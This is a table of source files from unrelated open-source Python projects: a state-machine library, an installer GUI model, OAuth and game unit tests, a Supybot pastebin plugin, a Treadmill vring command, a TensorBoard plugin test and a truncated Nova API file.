| repo_name (string, 5-100 chars) | ref (string, 12-67 chars) | path (string, 4-244 chars) | copies (string, 1-8 chars) | content (string, 0-1.05M chars, nullable ⌀) |
|---|---|---|---|---|
slobberchops/sordid-tools
|
refs/heads/master
|
machine/src/sordid/machine.py
|
1
|
#!/usr/bin/env python
#
# Copyright 2012 Rafe Kaplan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from sordid import util, props
class IllegalStateTransition(Exception):
pass
class State(util.SourceOrdered, props.HasProps):
name = props.ReadOnlyProperty()
machine = props.ReadOnlyProperty()
def __str__(self):
try:
return self.__string_value
except AttributeError:
name = getattr(self, 'name', None)
if name is not None:
name_value = name
else:
name_value = 'UNKNOWN'
machine = getattr(self, 'machine', None)
if machine is not None:
machine_name = machine.__name__
else:
machine_name = 'UNASSIGNED'
current_name = '%s::%s' % (machine_name, name_value)
if name is not None and machine is not None:
self.__string_value = current_name
return current_name
return self.__string_value
class Transitioner(props.HasProps):
def __init__(self, machine, transition):
self.machine = machine
self.__transition = transition
machine = props.ReadOnlyProperty()
@property
def transition(self):
return self.__transition
def __call__(self):
next_state = self.next_state
if next_state is None:
raise IllegalStateTransition(
    'There is no transition from state %s for %s' % (
        self.machine.state, self.__transition))
self.machine.state = next_state
return next_state
@property
def next_state(self):
assert self.machine is not None
return self.transition.get_next_state_from(self.machine.state)
class Transition:
def __init__(self, state_map):
super(Transition, self).__init__()
if isinstance(state_map, dict):
state_iterator = state_map.items()
else:
state_iterator = iter(state_map)
final_state_map = {}
seen_froms = set()
for froms, to in state_iterator:
    if isinstance(froms, State):
        froms = [froms]
    for next_from in froms:
        if next_from in seen_froms:
            raise AssertionError(
                'State %s is already defined for transition' % next_from)
        seen_froms.add(next_from)
        final_state_map[next_from] = to
self.__state_map = final_state_map
def get_next_state_from(self, state):
return self.__state_map.get(state, None)
class Machine(props.HasProps):
def __init__(self):
try:
initial_state = self.INIT
except AttributeError:
pass
else:
self.state = initial_state
for name, transition in type(self).iter_transitions():
assert transition is not None
setattr(self, name, Transitioner(self, transition))
@classmethod
def __config_props__(cls, attrs):
cls.__state_by_name = {}
cls.__transition_by_name = {}
for name, value in attrs.items():
props.config_prop(cls, name, value)
cls.state_names = sorted(cls.__state_by_name.values(),
key=lambda state: state.source_order)
if cls.__state_by_name:
first_state = cls.state_names[0]
try:
    cls.INIT = first_state
except AttributeError:
pass
@classmethod
def __config_prop__(cls, name, value):
if not props.config_prop_name(cls, name, value):
if isinstance(value, State):
value.name = name
value.machine = cls
cls.__state_by_name[name] = value
if isinstance(value, Transition):
cls.__transition_by_name[name] = value
@classmethod
def lookup_state(cls, name):
return cls.__state_by_name.get(name, None)
@classmethod
def lookup_transition(cls, name):
return cls.__transition_by_name.get(name, None)
@classmethod
def iter_transitions(cls):
return cls.__transition_by_name.items()
INIT = props.ReadOnlyProperty()
state = props.ValidatedProperty(props.type_validator(State))
state_names = props.ReadOnlyProperty()
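# Usage sketch (hypothetical machine; assumes props.HasProps wires up
# __config_props__ through its metaclass, as the code above implies):
if __name__ == '__main__':
    class TrafficLight(Machine):
        RED = State()
        GREEN = State()
        YELLOW = State()

        go = Transition({RED: GREEN})
        caution = Transition({GREEN: YELLOW})
        stop = Transition({YELLOW: RED})

    light = TrafficLight()  # starts in INIT, the first declared state
    print(light.state)      # -> TrafficLight::RED
    light.go()              # each transition becomes a bound Transitioner
    print(light.state)      # -> TrafficLight::GREEN
    try:
        light.stop()        # no GREEN -> RED rule is defined
    except IllegalStateTransition:
        print('transition rejected')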
|
AOSC-Dev/IE4unix
|
refs/heads/master
|
gui/model/installer.py
|
1
|
# Defines the main GUI installer
class InstallerDefinition:
def __init__(self):
self.tabs = []
self.buttons = []
def set_title(self, title, show=True):
if show: self.title = title
return self
def set_logo(self, logo, show=True):
# TODO: validate that the logo file exists
if show: self.logo = logo
return self
def tab(self, label, show=True):
tab = _Tab(label, self)
if show:
self.tabs.append(tab)
return tab
def button(self, label, img, callback):
button = _Button(label, img, callback)
self.buttons.append(button)
return self
# iteration
def checkboxes(self):
cbs = []
for tab in self.tabs:
for group in tab.groups:
for checkbox in group.checkboxes:
cbs.append(checkbox)
return cbs
def comboboxes(self):
cbs = []
for tab in self.tabs:
for group in tab.groups:
for combobox in group.comboboxes:
cbs.append(combobox)
return cbs
def textfields(self):
tfs = []
for tab in self.tabs:
for group in tab.groups:
for textfield in group.textfields:
tfs.append(textfield)
return tfs
class _Tab:
def __init__(self, label, program):
self.label = label
self.program = program
self.groups = []
def toptext(self, text, platform='all'):
self.text = text
return self
def group(self, label, show=True):
group = _Group(label, self)
if show: self.groups.append(group)
return group
def done(self):
return self.program
class _Group:
def __init__(self, label, top):
self.label = label
self.top = top
self.checkboxes = []
self.comboboxes = []
self.textfields = []
self.orientation = 'vertical'
def checkbox(self, label, command, checked=False, show=True):
checkbox = _CheckBox(label, command, checked, self)
if show: self.checkboxes.append(checkbox)
return self
def combobox(self, label, options, command, selected, show=True):
combo = _ComboBox(label, options, command, selected)
if show: self.comboboxes.append(combo)
return self
def textfield(self, label, value, command, show=True):
t = _TextField(label, value, command)
if show: self.textfields.append(t)
return self
def horizontal(self):
self.orientation = 'horizontal'
return self
def vertical(self):
self.orientation = 'vertical'
return self
def done(self):
return self.top
class _CheckBox:
def __init__(self, label, command, checked, top):
self.label = label
self.command = command
self.checked = checked
self.top = top
class _ComboBox:
def __init__(self, label, options, command, selected):
self.label = label
self.options = options.split(' ')
self.options.sort()
self.selected = selected
self.command = command
class _TextField:
def __init__(self, label, value, command):
self.label = label
self.value = value
self.command = command
class _Button:
def __init__(self, label, img, callback):
self.label = label
self.img = img
self.callback = callback
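# Usage sketch of the fluent interface above (labels, filenames and the
# callback are made up for illustration):
if __name__ == '__main__':
    installer = (InstallerDefinition()
                 .set_title('IE4unix Setup')
                 .set_logo('logo.png')
                 .tab('Main')
                     .group('Components')
                         .checkbox('Install core files', 'core', checked=True)
                         .combobox('Version', 'ie5 ie5.5 ie6', 'version', 'ie6')
                         .done()   # back to the tab
                     .done()       # back to the installer
                 .button('Install', 'install.png', lambda: None))
    print(len(installer.checkboxes()))  # -> 1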
|
clef/python-social-auth
|
refs/heads/master
|
social/tests/backends/test_strava.py
|
87
|
import json
from social.tests.backends.oauth import OAuth2Test
class StravaOAuthTest(OAuth2Test):
backend_path = 'social.backends.strava.StravaOAuth'
user_data_url = 'https://www.strava.com/api/v3/athlete'
expected_username = '227615'
access_token_body = json.dumps({
"access_token": "83ebeabdec09f6670863766f792ead24d61fe3f9",
"athlete": {
"id": 227615,
"resource_state": 3,
"firstname": "John",
"lastname": "Applestrava",
"profile_medium": "http://pics.com/227615/medium.jpg",
"profile": "http://pics.com/227615/large.jpg",
"city": "San Francisco",
"state": "California",
"country": "United States",
"sex": "M",
"friend": "null",
"follower": "null",
"premium": "true",
"created_at": "2008-01-01T17:44:00Z",
"updated_at": "2013-09-04T20:00:50Z",
"follower_count": 273,
"friend_count": 19,
"mutual_friend_count": 0,
"date_preference": "%m/%d/%Y",
"measurement_preference": "feet",
"email": "john@applestrava.com",
"clubs": [],
"bikes": [],
"shoes": []
}
})
user_data_body = json.dumps({
"id": 227615,
"resource_state": 2,
"firstname": "John",
"lastname": "Applestrava",
"profile_medium": "http://pics.com/227615/medium.jpg",
"profile": "http://pics.com/227615/large.jpg",
"city": "San Francisco",
"state": "CA",
"country": "United States",
"sex": "M",
"friend": "null",
"follower": "accepted",
"premium": "true",
"created_at": "2011-03-19T21:59:57Z",
"updated_at": "2013-09-05T16:46:54Z",
"approve_followers": "false"
})
def test_login(self):
self.do_login()
def test_partial_pipeline(self):
self.do_partial_pipeline()
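# The same pattern extends to other providers: declare the backend path,
# the user-data URL to mock, and canned JSON bodies. A sketch (the Example
# backend, URLs and usernames here are hypothetical):
#
#     class ExampleOAuth2Test(OAuth2Test):
#         backend_path = 'social.backends.example.ExampleOAuth2'
#         user_data_url = 'https://api.example.com/v1/me'
#         expected_username = 'jdoe'
#         access_token_body = json.dumps({'access_token': 'token'})
#         user_data_body = json.dumps({'id': 1, 'username': 'jdoe'})
#
#         def test_login(self):
#             self.do_login()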
|
ItsLastDay/academic_university_2016-2018
|
refs/heads/master
|
subjects/SoftwareDesign/au-software_design-2017/roguelike/src/tests/test_items.py
|
1
|
import unittest
from roguelike.world.exceptions import ExitFromMapException
from roguelike.position import Position
from roguelike.world.hero import Hero
from roguelike.world.items import *
from roguelike.world.game_settings import GameSettings
class MapMock:
@staticmethod
def exit_from_map():
raise ExitFromMapException
GameSettings.current_map = MapMock
class ItemTest(unittest.TestCase):
"""Tests for items functionality"""
def setUp(self):
Hero().hp = 1
Hero().mana = 100
Hero().inventory.items = []
Hero().inventory.item_by_bodyplace = dict()
def test_use_heal_potion(self):
heal = InstantItem(InstantItemType.HEAL_POTION, Position(0, 0))
cur_hp = Hero().hp
heal.use()
self.assertEqual(cur_hp + GameSettings.HEAL_POTION_AMOUNT, Hero().hp)
def test_use_mana_potion(self):
mana = InstantItem(InstantItemType.MANA_POTION, Position(0, 0))
cur_mana = Hero().mana
mana.use()
self.assertEqual(cur_mana + GameSettings.MANA_POTION_AMOUNT, Hero().mana)
def test_use_heal_scroll(self):
heal = Spell(SpellType.HEAL, Position(0, 0))
cur_hp = Hero().hp
heal.use()
self.assertEqual(cur_hp + GameSettings.HEAL_SCROLL_AMOUNT, Hero().hp)
def test_use_teleport_scroll(self):
tp = Spell(SpellType.TELEPORT, Position(0, 0))
with self.assertRaises(ExitFromMapException):
tp.use()
def test_wear_item(self):
head = WearableItem(BodyPlace.HEAD, 1, 0, 0, 0, 0)
cur_str = Hero().strength
head.use()
inv = Hero().inventory
self.assertEqual(0, len(inv.items))
self.assertIsNotNone(inv.get_item_at_bodyplace(BodyPlace.HEAD))
self.assertEqual(cur_str + 1, Hero().strength)
def test_wear_item_then_other(self):
inv = Hero().inventory
head = WearableItem(BodyPlace.HEAD, 1, 0, 0, 0, 0)
cur_str = Hero().strength
cur_dex = Hero().dexterity
head.use()
head = WearableItem(BodyPlace.HEAD, 0, 1, 0, 0, 0)
head.use()
self.assertEqual(1, len(inv.items))
self.assertIsNotNone(inv.get_item_at_bodyplace(BodyPlace.HEAD))
self.assertEqual(cur_str, Hero().strength)
self.assertEqual(cur_dex + 1, Hero().dexterity)
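# These tests mutate Hero() freely across calls, which presumes Hero behaves
# as a process-wide singleton. A minimal sketch of that pattern (an
# assumption; not necessarily the project's actual implementation):
#
#     class _Singleton(type):
#         _instances = {}
#
#         def __call__(cls, *args, **kwargs):
#             if cls not in cls._instances:
#                 cls._instances[cls] = super().__call__(*args, **kwargs)
#             return cls._instances[cls]
#
#     class Hero(metaclass=_Singleton):
#         ...
#
#     assert Hero() is Hero()   # every call returns the shared hero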
|
kg-bot/SupyBot
|
refs/heads/master
|
plugins/Pastebin/plugin.py
|
1
|
###
# Copyright (c) 2005, Ali Afshar
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.world as world
import supybot.dbi as dbi
import supybot.conf as conf
import supybot.utils as utils
from supybot.commands import *
import supybot.ircmsgs as ircmsgs
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import supybot.log as log
import os
import cgi
import time
import datetime
import cStringIO as StringIO
try:
PageModule = world.ircs[0].getCallback('Webserver').classModule
PageClass = PageModule.plugin.PluginPage
except Exception, e:
log.error('Webserver plugin must be loaded')
class Pastebin(callbacks.Plugin):
"""A pastebin including web server."""
def __init__(self, irc):
callbacks.Plugin.__init__(self, irc)
self.db = PastebinDB()
self.mostrecent = []
self.serverPlugin = irc.getCallback('Webserver')
if not self.serverPlugin:
irc.error('Webserver plugin must be running')
else:
PastebinHome.cbPastebin = self
self.serverPlugin.addSite('PasteBin', PastebinHome)
def doPaste(self, irc, cname, nick, text, ip):
date = time.time()
pid = self.db.addPaste(poster=nick, post=text, ip=ip, date=date)
self.mostrecent.append(pid)
if len(self.mostrecent) > self.registryValue('recentPasteCount'):
self.mostrecent.pop(0)
if self.registryValue('announce'):
url = '%s/%s/%s/PasteBin?view=%s' % \
(conf.supybot.plugins.Webserver.rootURL().rstrip('/'),
irc.network, cname[1:], pid)
mess = 'Pastebin: New paste by %s at %s' % \
(nick, format('%u', url))
m = ircmsgs.notice(cname, mess)
irc.sendMsg(m)
return pid
def mostRecent(self):
for pid in self.mostrecent:
yield self.db.get(pid)
def die(self):
self.serverPlugin.removeSite('PasteBin')
class PastebinDB(object):
def __init__(self):
basedir = conf.supybot.directories.data.dirize('Pastebin')
if not os.path.exists(basedir):
os.mkdir(basedir)
dbpath = os.path.join(basedir, 'pastes.db')
self.db = dbi.DB(dbpath, Record=PastebinRecord, Mapping='cdb')
def getPaste(self, pid):
return self.db.get(pid)
def addPaste(self, **kw):
newPaste = PastebinRecord(**kw)
pid = self.db.add(newPaste)
return pid
class PastebinHome(PageClass):
isLeaf = True
def renderContent(self, request):
self.cbPlugin.log.critical('%s %s', dir(request), request.method)
segments = []
pastetext = ''
prenick = ''
if request.method == 'GET':
if 'view' in request.args and len(request.args['view']):
pid = request.args['view'].pop()
try:
goodid = int(pid)
except ValueError:
goodid = None
if goodid:
record = self.cbPastebin.db.getPaste(goodid)
segments.append(self.renderView(request, record))
pastetext = record.post
else:
segments.append(self.renderHome(request))
else:
segments.append(self.renderHome(request))
else:
#post (we know this since no other requests ever get here)
segments.append(self.renderPost(request))
segments.append(self.renderForm(prenick, pastetext))
return ''.join(segments)
def renderView(self, request, record):
date = time.asctime(time.localtime(record.date))
lines = []
for i, line in enumerate(record.post.splitlines()):
lines.append(XHTML_LINE % (i,
cgi.escape(line).replace(' ', '&nbsp;')))
return XHTML_VIEW % (record.poster, date, ''.join(lines))
def renderHome(self, request):
T = """
<h4>Make a paste</h4>
<div>this paste will be announced in
<a href="%s">%s</a></div>
"""
return T % (self.renderURL(), self.cname)
def renderRecent(self):
t = """
<div>
%s
</div>
"""
L = []
for r in self.cbPastebin.mostRecent():
L.append(r)
def renderPost(self, request):
out = {}
if 'text' in request.args and len(request.args['text'][0]):
text = request.args['text'].pop()
nick = 'Anonymous'
if 'nick' in request.args and len(request.args['nick'][0]):
nick = request.args['nick'].pop()
host = request.host.host
pid = self.cbPastebin.doPaste(self.irc, self.cname, nick, text, host)
out['success'] = 'success'
out['message'] = ('Successful Paste<br>'
'<a href="%s/PasteBin?view=%s">'
'Go to your post'
'</a>') % (self.renderURL(), pid)
else:
out['success'] = 'Failure'
out['message'] = 'You entered bad details.'
return HTML_PDONE % out
def renderForm(self, prenick, pastetext):
form = {}
form['url'] = self.renderURL()
form['prenick'] = prenick
form['pastetext'] = pastetext
return HTML_PFORM % form
HTML_PFORM = """
<br /><br />
<form action="%(url)s/PasteBin" method="post">
<div>
Name:
<input type="text" size="24" maxlength="24" name="nick"
value="%(prenick)s" />
<input type="checkbox" name="savename" />Save my name
<br />
<textarea name="text" cols="80" rows="20" wrap="off">%(pastetext)s</textarea><br />
<input type="submit" value="Make Paste"/>
</div>
</form>
"""
HTML_PDONE = """
<div class="%(success)s">
%(message)s
</div>
"""
class PastebinRecord(dbi.Record):
__fields__ = ['poster',
'ip',
'date',
'post']
def beautifyTimeDelta(delta):
L = []
if delta.days:
L.append('%s days' % delta.days)
else:
seconds = delta.seconds
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
if hours:
L.append('%s hours' % hours)
elif minutes:
L.append('%s minutes' % minutes)
else:
L.append('%s seconds' % seconds)
return ','.join(L)
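# Example outputs (doctest-style; values chosen arbitrarily):
#
#     >>> import datetime
#     >>> beautifyTimeDelta(datetime.timedelta(days=2))
#     '2 days'
#     >>> beautifyTimeDelta(datetime.timedelta(hours=3, minutes=5))
#     '3 hours'
#     >>> beautifyTimeDelta(datetime.timedelta(seconds=42))
#     '42 seconds'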
Class = Pastebin
#The html templates
#could move them, but why bother?
XHTML_LINE = """
<div>
<span class="linenumber">%s</span>
<span class="line">%s</span>
</div>
"""
XHTML_VIEW = """
<div class="pasteheader">Posted by %s at %s</div>
<br />
<div>
%s
</div>
"""
XHTML_BADVIEW = """The selected paste was not found."""
XHTML_RECENT = """
<div class="recentitem">
<a href="/view?pid=%s">%s</a>
<div>
%s
</div>
</div>
"""
XHTML_PASTED = """
<div class="success">You have successfully pasted.</div>
<a href="/view?pid=%s">Go to your paste</a>
"""
XHTML_BADFORM = """
<div class="error">You failed to enter the correct for details.</div>
"""
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=78:
|
xshotD/pyglet
|
refs/heads/master
|
tests/window/EVENT_MOUSE_ENTER_LEAVE.py
|
33
|
#!/usr/bin/env python
'''Test that mouse enter and leave events work correctly.
Expected behaviour:
One window will be opened. Move the mouse in and out of this window
and ensure the events displayed are correct.
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import unittest
from pyglet import window
class EVENT_MOUSE_ENTER_LEAVE(unittest.TestCase):
def on_mouse_enter(self, x, y):
print 'Entered at %f, %f' % (x, y)
def on_mouse_leave(self, x, y):
print 'Left at %f, %f' % (x, y)
def test_motion(self):
w = window.Window(200, 200)
w.push_handlers(self)
while not w.has_exit:
w.dispatch_events()
w.close()
if __name__ == '__main__':
unittest.main()
|
toenuff/treadmill
|
refs/heads/master
|
lib/python/treadmill/sproc/vring.py
|
1
|
"""Treadmill vring manager."""
from __future__ import absolute_import
import signal
import sys
import logging
import yaml
import click
from .. import context
from .. import discovery
from .. import logcontext as lc
from .. import utils
from .. import vring
from .. import zkutils
_LOGGER = logging.getLogger(__name__)
def init():
"""Top level command handler."""
@click.command(name='vring')
@click.argument('manifest', type=click.File('rb'))
def vring_cmd(manifest):
"""Run vring manager."""
context.GLOBAL.zk.conn.add_listener(zkutils.exit_on_disconnect)
app = yaml.load(manifest.read())
with lc.LogContext(_LOGGER, app['name'], lc.ContainerAdapter) as log:
utils.validate(app, [('vring', True, dict)])
ring = app['vring']
utils.validate(ring, [('rules', True, list), ('cells', True,
list)])
if context.GLOBAL.cell not in ring['cells']:
log.critical('cell %s not listed in vring.',
context.GLOBAL.cell)
sys.exit(-1)
ringname = 'TM_OUTPUT_RING_%d' % ring['cells'].index(
context.GLOBAL.cell)
rules = ring['rules']
for rule in rules:
utils.validate(rule, [('pattern', True, str),
('endpoints', True, list)])
# Create translation for endpoint name to expected port #.
routing = {}
for endpoint in app.get('endpoints', []):
routing[endpoint['name']] = endpoint['port']
# Check that all ring endpoints are listed in the manifest.
vring_endpoints = set()
for rule in rules:
for rule_endpoint in rule['endpoints']:
if rule_endpoint not in routing:
log.critical(
'vring references non-existing endpoint: [%s]',
rule_endpoint)
sys.exit(-1)
vring_endpoints.add(rule_endpoint)
# TODO: discovery is limited to one rule for now.
if len(rules) != 1:
log.critical('(TODO): multiple rules are not supported.')
sys.exit(-1)
pattern = rules[0]['pattern']
app_discovery = discovery.Discovery(context.GLOBAL.zk.conn,
pattern, '*')
app_discovery.sync()
# Restore default signal mask disabled by python spawning new
# thread for Zk connection.
#
# TODO: should this be done as part of ZK connect?
for sig in range(1, signal.NSIG):
try:
signal.signal(sig, signal.SIG_DFL)
except RuntimeError:
pass
vring.init(ringname)
vring.run(ringname, routing, vring_endpoints, app_discovery)
return vring_cmd
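# Sketch of the manifest shape implied by the utils.validate() calls above
# (the app name, cells, endpoint names and ports are hypothetical):
#
#     name: proid.myapp#0000000001
#     endpoints:
#         - name: http
#           port: 8000
#     vring:
#         cells: [cell-east, cell-west]   # must include the current cell
#         rules:                          # exactly one rule is supported
#             - pattern: proid.myapp*
#               endpoints: [http]         # must match a manifest endpoint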
|
unaizalakain/django
|
refs/heads/master
|
tests/migrations/faulty_migrations/namespace/foo/__init__.py
|
12133432
| |
ibrahimkarahan/Flexget
|
refs/heads/develop
|
flexget/ui/plugins/__init__.py
|
12133432
| |
gkarlin/django-jenkins
|
refs/heads/master
|
build/Django/django/conf/locale/ru/__init__.py
|
12133432
| |
marksantesson/xmldump
|
refs/heads/master
|
xmldump/__init__.py
|
12133432
| |
pk400/catering
|
refs/heads/master
|
myvenv/lib/python3.4/site-packages/django/contrib/humanize/templatetags/__init__.py
|
12133432
| |
agrubb/tensorboard
|
refs/heads/master
|
tensorboard/plugins/scalar/scalars_plugin_test.py
|
4
|
# -*- coding: utf-8 -*-
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for the Scalars Plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os.path
from six import StringIO
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.scalar import summary
class ScalarsPluginTest(tf.test.TestCase):
_STEPS = 99
_LEGACY_SCALAR_TAG = 'ancient-values'
_SCALAR_TAG = 'simple-values'
_HISTOGRAM_TAG = 'complicated-values'
_DISPLAY_NAME = 'Walrus population'
_DESCRIPTION = 'the *most* valuable statistic'
_HTML_DESCRIPTION = '<p>the <em>most</em> valuable statistic</p>'
_RUN_WITH_LEGACY_SCALARS = '_RUN_WITH_LEGACY_SCALARS'
_RUN_WITH_SCALARS = '_RUN_WITH_SCALARS'
_RUN_WITH_HISTOGRAM = '_RUN_WITH_HISTOGRAM'
def __init__(self, *args, **kwargs):
super(ScalarsPluginTest, self).__init__(*args, **kwargs)
self.logdir = None
self.plugin = None
def set_up_with_runs(self, run_names):
self.logdir = self.get_temp_dir()
for run_name in run_names:
self.generate_run(run_name)
multiplexer = event_multiplexer.EventMultiplexer(size_guidance={
# don't truncate my test data, please
event_accumulator.TENSORS: self._STEPS,
})
multiplexer.AddRunsFromDirectory(self.logdir)
multiplexer.Reload()
context = base_plugin.TBContext(logdir=self.logdir, multiplexer=multiplexer)
self.plugin = scalars_plugin.ScalarsPlugin(context)
def testRoutesProvided(self):
"""Tests that the plugin offers the correct routes."""
self.set_up_with_runs([self._RUN_WITH_SCALARS])
routes = self.plugin.get_plugin_apps()
self.assertIsInstance(routes['/scalars'], collections.Callable)
self.assertIsInstance(routes['/tags'], collections.Callable)
def generate_run(self, run_name):
tf.reset_default_graph()
sess = tf.Session()
placeholder = tf.placeholder(tf.float32, shape=[3])
if run_name == self._RUN_WITH_LEGACY_SCALARS:
tf.summary.scalar(self._LEGACY_SCALAR_TAG, tf.reduce_mean(placeholder))
elif run_name == self._RUN_WITH_SCALARS:
summary.op(self._SCALAR_TAG, tf.reduce_sum(placeholder),
display_name=self._DISPLAY_NAME,
description=self._DESCRIPTION)
elif run_name == self._RUN_WITH_HISTOGRAM:
tf.summary.histogram(self._HISTOGRAM_TAG, placeholder)
else:
assert False, 'Invalid run name: %r' % run_name
summ = tf.summary.merge_all()
subdir = os.path.join(self.logdir, run_name)
writer = tf.summary.FileWriter(subdir)
writer.add_graph(sess.graph)
for step in xrange(self._STEPS):
feed_dict = {placeholder: [1 + step, 2 + step, 3 + step]}
s = sess.run(summ, feed_dict=feed_dict)
writer.add_summary(s, global_step=step)
writer.close()
def test_index(self):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
self.assertEqual({
self._RUN_WITH_LEGACY_SCALARS: {
self._LEGACY_SCALAR_TAG: {
'displayName': self._LEGACY_SCALAR_TAG,
'description': '',
},
},
self._RUN_WITH_SCALARS: {
'%s/scalar_summary' % self._SCALAR_TAG: {
'displayName': self._DISPLAY_NAME,
'description': self._HTML_DESCRIPTION,
},
},
self._RUN_WITH_HISTOGRAM: {},
}, self.plugin.index_impl())
def _test_scalars_json(self, run_name, tag_name, should_work=True):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
if should_work:
(data, mime_type) = self.plugin.scalars_impl(
tag_name, run_name, scalars_plugin.OutputFormat.JSON)
self.assertEqual('application/json', mime_type)
self.assertEqual(len(data), self._STEPS)
else:
with self.assertRaises(KeyError):
self.plugin.scalars_impl(self._SCALAR_TAG, run_name,
scalars_plugin.OutputFormat.JSON)
def _test_scalars_csv(self, run_name, tag_name, should_work=True):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
if should_work:
(data, mime_type) = self.plugin.scalars_impl(
tag_name, run_name, scalars_plugin.OutputFormat.CSV)
self.assertEqual('text/csv', mime_type)
s = StringIO(data)
reader = csv.reader(s)
self.assertEqual(['Wall time', 'Step', 'Value'], next(reader))
self.assertEqual(len(list(reader)), self._STEPS)
else:
with self.assertRaises(KeyError):
self.plugin.scalars_impl(self._SCALAR_TAG, run_name,
scalars_plugin.OutputFormat.CSV)
def test_scalars_json_with_legacy_scalars(self):
self._test_scalars_json(self._RUN_WITH_LEGACY_SCALARS,
self._LEGACY_SCALAR_TAG)
def test_scalars_json_with_scalars(self):
self._test_scalars_json(self._RUN_WITH_SCALARS,
'%s/scalar_summary' % self._SCALAR_TAG)
def test_scalars_json_with_histogram(self):
self._test_scalars_json(self._RUN_WITH_HISTOGRAM, self._HISTOGRAM_TAG,
should_work=False)
def test_scalars_csv_with_legacy_scalars(self):
self._test_scalars_csv(self._RUN_WITH_LEGACY_SCALARS,
self._LEGACY_SCALAR_TAG)
def test_scalars_csv_with_scalars(self):
self._test_scalars_csv(self._RUN_WITH_SCALARS,
'%s/scalar_summary' % self._SCALAR_TAG)
def test_scalars_csv_with_histogram(self):
self._test_scalars_csv(self._RUN_WITH_HISTOGRAM, self._HISTOGRAM_TAG,
should_work=False)
def test_active_with_legacy_scalars(self):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS])
self.assertTrue(self.plugin.is_active())
def test_active_with_scalars(self):
self.set_up_with_runs([self._RUN_WITH_SCALARS])
self.assertTrue(self.plugin.is_active())
def test_active_with_histogram(self):
self.set_up_with_runs([self._RUN_WITH_HISTOGRAM])
self.assertFalse(self.plugin.is_active())
def test_active_with_all(self):
self.set_up_with_runs([self._RUN_WITH_LEGACY_SCALARS,
self._RUN_WITH_SCALARS,
self._RUN_WITH_HISTOGRAM])
self.assertTrue(self.plugin.is_active())
if __name__ == '__main__':
tf.test.main()
|
dimid/ansible-modules-extras
|
refs/heads/devel
|
files/__init__.py
|
12133432
| |
vmturbo/nova
|
refs/heads/master
|
nova/tests/unit/api/openstack/compute/legacy_v2/__init__.py
|
12133432
| |
marook/roxappletbuilder2
|
refs/heads/master
|
framework/src/test/roxappletbuilder_test/__init__.py
|
12133432
| |
shankig/wye
|
refs/heads/master
|
wye/organisations/__init__.py
|
12133432
| |
wsyzxcn/tornado
|
refs/heads/master
|
dev/server/__init__.py
|
12133432
| |
NewpTone/stacklab-nova
|
refs/heads/master
|
nova/api/openstack/volume/volumes.py
|
5
|
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes api."""
import webob
from webob import exc
from xml.dom import minidom
